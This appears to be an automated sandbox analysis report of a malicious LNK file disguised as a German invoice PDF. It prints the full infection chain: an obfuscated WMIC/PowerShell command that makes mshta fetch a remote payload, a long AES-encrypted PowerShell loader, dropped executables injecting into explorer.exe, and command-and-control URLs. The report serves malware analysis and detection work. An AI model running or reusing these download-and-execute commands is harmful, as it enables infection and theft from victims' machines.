00000015.00000003.2763657975.0000000003110000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2817832934.0000000003110000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2767715738.000000000310D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841308679.000000000311D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2840914690.0000000003110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://securesways.click/api
                      Source: explorer.exe, 00000015.00000003.2839435655.00000000030BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2840914690.00000000030BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://securesways.click/api1N
                      Source: explorer.exe, 00000015.00000003.2686677332.0000000003130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://securesways.click/apiM
                      Source: explorer.exe, 00000015.00000003.2632949061.00000000030BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://securesways.click/apiU
                      Source: explorer.exe, 00000015.00000003.2734517516.0000000003130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://securesways.click/apia
                      Source: explorer.exe, 00000015.00000003.2734517516.0000000003130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://securesways.click/apiaX
                      Source: explorer.exe, 00000015.00000003.2763626121.000000000311D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2763685587.0000000003130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://securesways.click/apis
                      Source: explorer.exe, 00000015.00000003.2632949061.00000000030AE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2633160316.00000000030B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://securesways.click:443/api
                      Source: TCUINOVJ.exe, 0000000F.00000003.2256610867.00000000026E6000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000000.2259726588.0000000000401000.00000020.00000001.01000000.00000010.sdmpString found in binary or memory: https://stats.itopupdate.com/multi_app_new.php
                      Source: explorer.exe, 00000015.00000003.2688636073.00000000061B9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                      Source: explorer.exe, 00000015.00000003.2688636073.00000000061B9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                      Source: explorer.exe, 00000015.00000003.2689095480.0000000005F1D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                      Source: explorer.exe, 00000015.00000003.2689095480.0000000005F1D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                      Source: iScrPaint.exe, 00000010.00000003.2271753574.0000000000830000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.catcert.cat/verCIT-10
                      Source: TCUINOVJ.exe, 0000000F.00000003.2256610867.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000003.2271753574.0000000000830000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.catcert.net/verarrel
                      Source: TCUINOVJ.exe, 0000000F.00000003.2256610867.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000003.2271753574.0000000000830000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                      Source: explorer.exe, 00000015.00000003.2634324931.0000000005EC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634404916.0000000005EC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634516058.0000000005EC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: explorer.exe, 00000015.00000003.2634324931.0000000005EC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634404916.0000000005EC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634516058.0000000005EC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: explorer.exe, 00000015.00000003.2688636073.00000000061B9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                      Source: explorer.exe, 00000015.00000003.2688636073.00000000061B9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                      Source: explorer.exe, 00000015.00000003.2688636073.00000000061B9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                      Source: explorer.exe, 00000015.00000003.2688636073.00000000061B9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                      Source: explorer.exe, 00000015.00000003.2688636073.00000000061B9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                      Source: explorer.exe, 00000015.00000003.2688636073.00000000061B9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
                      Source: unknownHTTPS traffic detected: 62.182.21.105:443 -> 192.168.2.5:49704 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 62.182.21.105:443 -> 192.168.2.5:49708 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49803 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49815 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49821 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49832 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49838 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49849 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49855 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49871 version: TLS 1.2
                      Source: Yara matchFile source: Process Memory Space: iScrPaint.exe PID: 5880, type: MEMORYSTR

                      System Summary

                      barindex
                      Contains functionality to create processes via WMI
                      Source: WMIC.exe, 00000000.00000002.2025755289.00000155FA020000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\System32\Wbem\wmic.exe"C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/documentcomplie"C:\Users\user\Desktop\Rechnung736258.pdf.lnkWinsta0\Defaultp2Vmemstr_b1c01ac5-9
                      Powershell drops PE file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\TCUINOVJ.exeJump to dropped file
                      Windows shortcut file (LNK) contains suspicious command line arguments
                      Source: Rechnung736258.pdf.lnkLNK file: process call create "powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/documentcomplie"
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeCode function: 15_2_00404FAA15_2_00404FAA
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeCode function: 15_2_0041206B15_2_0041206B
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeCode function: 15_2_0041022D15_2_0041022D
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeCode function: 15_2_00411F9115_2_00411F91
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe 46AFBF1CBD2E1B5E108C133D4079FADDC7347231B0C48566FD967A3070745E7F
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeCode function: String function: 0040243B appears 37 times
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2845
                      Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2845Jump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winLNK@36/74@5/3
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeCode function: 15_2_00407776 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,15_2_00407776
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeCode function: 15_2_0040118A GetDiskFreeSpaceExW,SendMessageW,15_2_0040118A
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeCode function: 15_2_004034C1 _wtol,_wtol,SHGetSpecialFolderPathW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,CoCreateInstance,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,15_2_004034C1
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeCode function: 15_2_00401BDF GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress,15_2_00401BDF
                      Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\documentcomplie[1]Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6472:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6128:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5796:120:WilError_03
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bav2tqbe.jfe.ps1Jump to behavior
                      Source: Yara matchFile source: 16.0.iScrPaint.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000010.00000000.2259726588.0000000000401000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000003.2256610867.00000000026E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\iScrPaint.exe, type: DROPPED
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
                      Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: Rechnung736258.pdf.lnkReversingLabs: Detection: 15%
                      Source: Rechnung736258.pdf.lnkVirustotal: Detection: 24%
                      Source: unknownProcess created: C:\Windows\System32\wbem\WMIC.exe "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/documentcomplie"
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/documentcomplie
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://dimitricostruzioni.ch/documentcomplie
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '0A4F04B664291D3C891EE57CF9AA6E0A23752FE985FC9FD64BB3465A7D797346AC4EB8E6FA6258E6C499D05779F61BCEC012DC00DA9FBBDBA937EA0E7F819DA30D6226959EA7519380176563334C188B79BB6DA507B41F9479C4ECD6FCFBEAC89945BB235377DAFFC2B2E0422A373DF64E2DDF535FA76F2F6195EDE596B0317D4804786027E0B623BF5D1D584D6065AFA5E42CE963A4614903389786638A13BFEAD5BCA6D5632E96589B3891210B8EE6577C079CDE437E55F527D851A6E360A415EC287B6A355E4474FF7AFFC5E1C2C84DF35ED4839335D434B4C6EB3E0E9BE4C9BB60244693023805DB66378A17C37A948E7A51FC5D87A0BC7A2EB7D9F4DA156623A9183F872D54778974ADE95F381DE2AAE416E6172BAAEF2320C24A65879A0D52DAD6FAF25F6401BA3456E99B3F0C534868BB75527DBE10715FC36A8BB44C9977366FA95D0EE4ADCEA23B71915BE1B53B87D12D50B68707404AEFB59E47D774511900EB4509210E15424197DEDADBF6270B4BBDB7CA28491995A87F9A3CB9FC232BFB8DD6FC010D911FB9A85D8D423DDB3D610F88D031C25B6AAAA7F6F7E86773457EBF9E1627E87A801B0A5F69AB28A75F7A7684E8E08FBD622656F168B01419A0F9142A0B1E96F0A4019AC5AE6015EC400D4957D3658DA911E88F29E506EE2B315649007D4AD02B9AC42C6536DF21C03BA8A4513A3E4C547246C363F281F230A226EA7FEAF52932752BB3E5AC1DC92E54264FDEEC820E460FF5BF265D1D5A1A7357FCC07BBCB15D0DFC7AFB18D7D8ED8D11813ABE2565BCF731F20AB1D1A8D393D9E8CCA5D1AC1297CE33468EA8FEA4B579AC4DBD4338C86D8207ED1485FEA355E9CE074FCF496ED4D2CEAAFFBF6FE7CD314D30A0CF1CA039AA1EDC0440C8C082BBC07A3458CB8039EB599B8C59B1EEAE0186F371C0B858E495C81E310381A10B00AA941D672D8F0FDD94D6BCF6344EA8D3CF3BE07A0F29AD3BC172F5FEC0541A77B8007A0BA0BA5CD14298C1D74F200A847C8A8586EDAF36D5C8040A3D244982700F4E595857B0619867A217F8FEEAE91B337EF244871580E0CEC7EC35A6E5C5356234C447A13CF21B5B3DCAF3D5A547E32FB972AE6DDFDA3C0C7198771CA4D327A77575F82B079A6BCE811999F9AA1DBCBBA2938F34BE32EADA581AB69F8BC451713EC828E6D3D62F721EB09FC154CB3D93C7D958C9F426B244650B32A5CDBBF9F9512F07496C1DA9AED38876CC794D2073594342E5E9B7E851A0C3AE91198802506F7FE48D8430BC5E4C06506680E3D7613B81E01A16CFD524741269AADD19A2E1CF4A2BA75CF3B27D0B2A2C19729DEF1BAA021F00A33B6CBCB211F0D14BB0D6FDB116AC0D76B7EB14848CA0F71871993F73D63256F5FA94A2FAC681186693CF2F3776C5B0D8C1FD35E87EF9FD6CC7633C06DD2ECB5AE82A9FDCE2BB6DA99DB57E009DCDE40871998B8FDCCD59411335EB4B916E81193A27706177634DA7F7994FB1DD6A944AC9DAECDCA2D45C883E465AC6BC3613FFFE963C92F84B60C9183D522E49857344D0E0171A1B4AF1FBF07286E4C23EC443EFA2CAAB4BEBF411FBE1E4799292B05548811AD68EC505467241E859FA3DD71727E100C7C6F8664659725043526B66756D7661597247';function vyt ($fFWwZ){return -split ($fFWwZ -replace '..', '0x$& ')};$dHSPoMnm = vyt($ddg.SubString(0, 2304));$pzg = [System.Security.Cryptography.Aes]::Create();$pzg.Key = vyt($ddg.SubString(2304));$pzg.IV = New-Object byte[] 16;$dSnUqar = $pzg.CreateDecryptor();$vwahlx = [System.String]::new($dSnUqar.TransformFinalBlock($dHSPoMnm, 0,$dHSPoMnm.Length)); sal fd $vwahlx.Substring(3,3); fd $vwahlx.Substring(6)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\KlarnaInvoice42611.pdf"
                      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1752,i,8685861103174925006,15707268363344924565,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\TCUINOVJ.exe "C:\Users\user\AppData\Roaming\TCUINOVJ.exe"
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeProcess created: C:\Users\user\iScrPaint.exe "C:\Users\user\iScrPaint.exe"
                      Source: C:\Users\user\iScrPaint.exeProcess created: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe
                      Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://dimitricostruzioni.ch/documentcomplieJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '0A4F04B664291D3C891EE57CF9AA6E0A23752FE985FC9FD64BB3465A7D797346AC4EB8E6FA6258E6C499D05779F61BCEC012DC00DA9FBBDBA937EA0E7F819DA30D6226959EA7519380176563334C188B79BB6DA507B41F9479C4ECD6FCFBEAC89945BB235377DAFFC2B2E0422A373DF64E2DDF535FA76F2F6195EDE596B0317D4804786027E0B623BF5D1D584D6065AFA5E42CE963A4614903389786638A13BFEAD5BCA6D5632E96589B3891210B8EE6577C079CDE437E55F527D851A6E360A415EC287B6A355E4474FF7AFFC5E1C2C84DF35ED4839335D434B4C6EB3E0E9BE4C9BB60244693023805DB66378A17C37A948E7A51FC5D87A0BC7A2EB7D9F4DA156623A9183F872D54778974ADE95F381DE2AAE416E6172BAAEF2320C24A65879A0D52DAD6FAF25F6401BA3456E99B3F0C534868BB75527DBE10715FC36A8BB44C9977366FA95D0EE4ADCEA23B71915BE1B53B87D12D50B68707404AEFB59E47D774511900EB4509210E15424197DEDADBF6270B4BBDB7CA28491995A87F9A3CB9FC232BFB8DD6FC010D911FB9A85D8D423DDB3D610F88D031C25B6AAAA7F6F7E86773457EBF9E1627E87A801B0A5F69AB28A75F7A7684E8E08FBD622656F168B01419A0F9142A0B1E96F0A4019AC5AE6015EC400D4957D3658DA911E88F29E506EE2B315649007D4AD02B9AC42C6536DF21C03BA8A4513A3E4C547246C363F281F230A226EA7FEAF52932752BB3E5AC1DC92E54264FDEEC820E460FF5BF265D1D5A1A7357FCC07BBCB15D0DFC7AFB18D7D8ED8D11813ABE2565BCF731F20AB1D1A8D393D9E8CCA5D1AC1297CE33468EA8FEA4B579AC4DBD4338C86D8207ED1485FEA355E9CE074FCF496ED4D2CEAAFFBF6FE7CD314D30A0CF1CA039AA1EDC0440C8C082BBC07A3458CB8039EB599B8C59B1EEAE0186F371C0B858E495C81E310381A10B00AA941D672D8F0FDD94D6BCF6344EA8D3CF3BE07A0F29AD3BC172F5FEC0541A77B8007A0BA0BA5CD14298C1D74F200A847C8A8586EDAF36D5C8040A3D244982700F4E595857B0619867A217F8FEEAE91B337EF244871580E0CEC7EC35A6E5C5356234C447A13CF21B5B3DCAF3D5A547E32FB972AE6DDFDA3C0C7198771CA4D327A77575F82B079A6BCE811999F9AA1DBCBBA2938F34BE32EADA581AB69F8BC451713EC828E6D3D62F721EB09FC154CB3D93C7D958C9F426B244650B32A5CDBBF9F9512F07496C1DA9AED38876CC794D2073594342E5E9B7E851A0C3AE91198802506F7FE48D8430BC5E4C06506680E3D7613B81E01A16CFD524741269AADD19A2E1CF4A2BA75CF3B27D0B2A2C19729DEF1BAA021F00A33B6CBCB211F0D14BB0D6FDB116AC0D76B7EB14848CA0F71871993F73D63256F5FA94A2FAC681186693CF2F3776C5B0D8C1FD35E87EF9FD6CC7633C06DD2ECB5AE82A9FDCE2BB6DA99DB57E009DCDE40871998B8FDCCD59411335EB4B916E81193A27706177634DA7F7994FB1DD6A944AC9DAECDCA2D45C883E465AC6BC3613FFFE963C92F84B60C9183D522E49857344D0E0171A1B4AF1FBF07286E4C23EC443EFA2CAAB4BEBF411FBE1E4799292B05548811AD68EC505467241E859FA3DD71727E100C7C6F8664659725043526B66756D7661597247';function vyt ($fFWwZ){return -split ($fFWwZ -replace '..', '0x$& ')};$dHSPoMnm = vyt($ddg.SubString(0, 2304));$pzg = [System.Security.Cryptography.Aes]::Create();$pzg.Key = vyt($ddg.SubString(2304));$pzg.IV = New-Object byte[] 16;$dSnUqar = $pzg.CreateDecryptor();$vwahlx = [System.String]::new($dSnUqar.TransformFinalBlock($dHSPoMnm, 0,$dHSPoMnm.Length)); sal fd $vwahlx.Substring(3,3); fd $vwahlx.Substring(6)Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\KlarnaInvoice42611.pdf"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\TCUINOVJ.exe "C:\Users\user\AppData\Roaming\TCUINOVJ.exe" Jump to behavior
                      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
                      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1752,i,8685861103174925006,15707268363344924565,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
                      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeProcess created: C:\Users\user\iScrPaint.exe "C:\Users\user\iScrPaint.exe" Jump to behavior
                      Source: C:\Users\user\iScrPaint.exeProcess created: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe
                      Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
